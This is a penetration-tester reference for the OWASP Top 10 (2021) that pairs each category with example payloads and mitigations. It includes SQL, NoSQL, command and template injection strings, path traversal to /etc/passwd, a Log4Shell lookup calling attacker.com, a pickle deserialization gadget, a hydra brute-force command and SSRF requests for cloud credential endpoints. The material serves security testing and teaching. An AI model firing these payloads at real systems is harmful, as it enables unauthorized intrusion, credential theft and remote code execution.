OWASP-TOP10
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Reference for penetration testers covering each OWASP Top 10 category with attack vectors, example payloads, and mitigations.
A01:2021 - BROKEN ACCESS CONTROL#
Description:
Restrictions on authenticated users are not properly enforced.
Attackers can access unauthorized functions or data.
Common Attack Vectors:
- IDOR (Insecure Direct Object Reference)
- Path traversal to access restricted files
- Privilege escalation via parameter tampering
- Forced browsing to admin panels
- CORS misconfiguration allowing unauthorized API access
- JWT token manipulation (changing role claims)
Example Payloads:
# IDOR - change user ID in API request
GET /api/users/1001/profile -> GET /api/users/1002/profile
# Forced browsing
/admin, /admin/dashboard, /management, /console
# Parameter tampering
POST /updateRole {"userId":"1001","role":"admin"}
# Path traversal
GET /files?name=../../../../etc/passwd
# CORS test
curl -H "Origin: https://evil.com" -v https://target.com/api/data
Mitigation:
- Implement server-side access control checks on every request
- Deny by default, use allowlists
- Use indirect object references (UUIDs instead of sequential IDs)
- Rate limit API and controller access
- Disable directory listing, remove metadata files (.git, .svn)
A02:2021 - CRYPTOGRAPHIC FAILURES#
Description: Sensitive data exposure due to weak or missing cryptography. Previously known as "Sensitive Data Exposure." Common Attack Vectors: - Cleartext data transmission (HTTP instead of HTTPS) - Weak or deprecated algorithms (MD5, SHA1, DES, RC4) - Hardcoded encryption keys or secrets in source code - Missing encryption at rest for sensitive data - Weak TLS configuration (SSLv3, TLS 1.0/1.1) Example Payloads: # Check for weak TLS nmap --script ssl-enum-ciphers -p 443 target.com sslscan target.com testssl.sh target.com # Search for hardcoded secrets in JS grep -rn "apiKey\|secret\|password\|token" *.js # Check for HTTP transmission of sensitive data # Intercept login forms submitting over HTTP # Padding oracle attack padbuster https://target.com/login <encrypted_cookie> 8 Mitigation: - Enforce TLS 1.2+ with strong cipher suites - Encrypt all sensitive data at rest and in transit - Use bcrypt/scrypt/argon2 for password hashing - Rotate encryption keys regularly - Do not store sensitive data unnecessarily
A03:2021 - INJECTION#
Description:
Untrusted data is sent to an interpreter as part of a command or query.
Includes SQL, NoSQL, OS command, LDAP, and XPath injection.
Common Attack Vectors:
- SQL injection (classic, blind, time-based, UNION-based)
- NoSQL injection (MongoDB operator injection)
- OS command injection
- LDAP injection
- Template injection (SSTI)
Example Payloads:
# SQL injection
' OR 1=1--
' UNION SELECT username,password FROM users--
' AND (SELECT SLEEP(5))--
admin'--
# NoSQL injection (MongoDB)
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
# OS command injection
; ls -la
| cat /etc/passwd
$(whoami)
`id`
# SSTI (Jinja2)
{{7*7}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
# LDAP injection
*)(uid=*))(|(uid=*
Mitigation:
- Use parameterized queries / prepared statements
- Use ORM frameworks properly
- Input validation with allowlists
- Escape special characters for the specific interpreter
- Least privilege database accounts
A04:2021 - INSECURE DESIGN#
Description:
Flaws in design and architecture. Missing or ineffective security
controls that should have been designed in from the start.
Common Attack Vectors:
- Business logic flaws (negative quantities, race conditions)
- Missing rate limiting on sensitive operations
- Insecure password recovery flows
- Lack of multi-factor authentication on critical functions
- Trust boundary violations
Example Payloads:
# Business logic - negative price
POST /purchase {"item":"widget","quantity":-1,"price":50.00}
# Race condition
# Send 50 concurrent requests to redeem a coupon
for i in $(seq 1 50); do
curl -s -X POST https://target.com/redeem -d "code=GIFT50" &
done
# Password reset abuse
# Enumerate users via different error messages
POST /reset {"email":"exists@target.com"} -> "Reset email sent"
POST /reset {"email":"noexist@target.com"} -> "User not found"
Mitigation:
- Threat modeling during design phase
- Secure design patterns and reference architectures
- Rate limiting and anti-automation controls
- Unit and integration tests for abuse cases
- Plausibility checks on business logic
A05:2021 - SECURITY MISCONFIGURATION#
Description: Missing or insecure configuration at any level of the application stack (platform, web server, framework, cloud services). Common Attack Vectors: - Default credentials left unchanged - Unnecessary features enabled (directory listing, debug mode) - Verbose error messages revealing stack traces - Missing security headers - Cloud storage buckets left public - Unpatched software Example Payloads: # Directory listing GET /images/ -> directory listing exposed # Debug mode GET /debug, /console, /actuator, /elmah.axd, /trace.axd # Default credentials admin:admin, admin:password, tomcat:tomcat, root:toor # AWS S3 bucket enumeration aws s3 ls s3://target-bucket --no-sign-request # Security header check curl -I https://target.com | grep -iE "x-frame|x-content|strict|csp" # Spring Boot Actuator GET /actuator/env GET /actuator/heapdump Mitigation: - Automated hardening process for deployments - Minimal platform without unnecessary features - Review and update configurations regularly - Implement security headers (CSP, HSTS, X-Frame-Options) - Segmented application architecture
A06:2021 - VULNERABLE AND OUTDATED COMPONENTS#
Description:
Using components (libraries, frameworks, software) with known
vulnerabilities or that are unsupported/out of date.
Common Attack Vectors:
- Exploiting known CVEs in outdated libraries
- Using components with no security patches
- Dependency confusion attacks
- Supply chain attacks via compromised packages
Example Payloads:
# Identify versions
Wappalyzer, WhatWeb, BuiltWith
curl https://target.com | grep -i "jquery\|angular\|react\|bootstrap"
# Check for known vulnerabilities
npm audit
pip-audit
snyk test
retire.js
# Log4Shell (CVE-2021-44228)
${jndi:ldap://attacker.com/exploit}
# Apache Struts RCE
%{(#cmd='id').(#iswin=...)}
Mitigation:
- Maintain inventory of all components and versions
- Subscribe to security advisories
- Use SCA tools (OWASP Dependency-Check, Snyk, Dependabot)
- Only obtain components from official sources
- Remove unused dependencies
A07:2021 - IDENTIFICATION AND AUTHENTICATION FAILURES#
Description:
Weaknesses in authentication mechanisms allowing credential
stuffing, brute force, or session hijacking.
Common Attack Vectors:
- Credential stuffing with breached password lists
- Brute force attacks on login endpoints
- Session fixation
- Weak session tokens
- Missing MFA on critical functions
Example Payloads:
# Brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid"
# Session fixation
# Set session cookie before authentication, check if it persists
# Credential stuffing
# Use tools like Burp Intruder with breach databases
# Default/weak credentials
admin:admin, admin:123456, test:test
# Password reset token prediction
# Capture multiple reset tokens, check for patterns
Mitigation:
- Implement MFA
- Rate limit and account lockout after failed attempts
- Use secure session management (regenerate on login)
- Check passwords against breach databases (Have I Been Pwned API)
- Enforce strong password policies
A08:2021 - SOFTWARE AND DATA INTEGRITY FAILURES#
Description:
Code and infrastructure that does not protect against integrity
violations. Includes insecure deserialization and CI/CD pipeline
compromise.
Common Attack Vectors:
- Insecure deserialization
- CI/CD pipeline manipulation
- Auto-update without integrity verification
- Unsigned or unverified software packages
Example Payloads:
# Java deserialization (ysoserial)
java -jar ysoserial.jar CommonsCollections1 "id" | base64
# PHP object injection
O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}
# Python pickle deserialization
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
# .NET deserialization
ysoserial.net -g WindowsIdentity -f Json.Net -c "calc"
Mitigation:
- Use digital signatures to verify software/data integrity
- Ensure CI/CD pipelines have proper access control
- Do not deserialize untrusted data
- Use integrity checks for all software updates
- Review code and configuration changes
A09:2021 - SECURITY LOGGING AND MONITORING FAILURES#
Description: Insufficient logging, monitoring, and alerting allows attackers to operate undetected and persist in systems. Common Attack Vectors: - Log injection to corrupt log files - Exploiting lack of monitoring to maintain persistence - Covering tracks by clearing logs - Pivoting undetected due to missing alerts Example Payloads: # Log injection username=admin%0d%0a[2026-03-19 12:00:00] INFO: Admin logged in successfully # Log evasion - encode payloads to avoid detection # Use base64, URL encoding, or Unicode to bypass log pattern matching # Check if logging is present # Perform actions and verify if they appear in logs # Test: failed logins, access control failures, input validation failures Mitigation: - Log all authentication events, access control failures, input validation - Use centralized log management (SIEM) - Ensure logs cannot be tampered with - Establish effective monitoring and alerting - Create incident response and recovery plans
A10:2021 - SERVER-SIDE REQUEST FORGERY (SSRF)#
Description: Application fetches a remote resource without validating the user-supplied URL, allowing attackers to access internal services. Common Attack Vectors: - Access cloud metadata endpoints - Port scanning internal networks - Access internal admin panels - Read local files via file:// protocol - Bypass firewall rules Example Payloads: # AWS metadata http://169.254.169.254/latest/meta-data/iam/security-credentials/ # Internal services http://127.0.0.1:8080/admin http://localhost:6379/ (Redis) http://[::1]:80/ # DNS rebinding # Use a domain that resolves to 127.0.0.1 after TTL expires # File access file:///etc/passwd file:///proc/self/environ # IP encoding bypass http://0x7f000001/ (hex for 127.0.0.1) http://2130706433/ (decimal for 127.0.0.1) http://0177.0.0.1/ (octal) Mitigation: - Validate and sanitize all client-supplied URLs - Use allowlists for permitted domains/IPs - Do not send raw responses to clients - Disable HTTP redirections - Use network segmentation to limit SSRF impact
QUICK REFERENCE TABLE#
A01 Broken Access Control -> Test IDOR, forced browsing, privilege escalation A02 Cryptographic Failures -> Check TLS, hashing, key management A03 Injection -> SQLi, NoSQLi, CMDi, SSTI A04 Insecure Design -> Business logic, race conditions A05 Security Misconfiguration -> Defaults, debug, headers, cloud A06 Vulnerable Components -> CVE lookup, SCA tools A07 Authentication Failures -> Brute force, session, MFA A08 Integrity Failures -> Deserialization, CI/CD A09 Logging/Monitoring Failures -> Log injection, coverage gaps A10 SSRF -> Internal access, metadata, DNS rebinding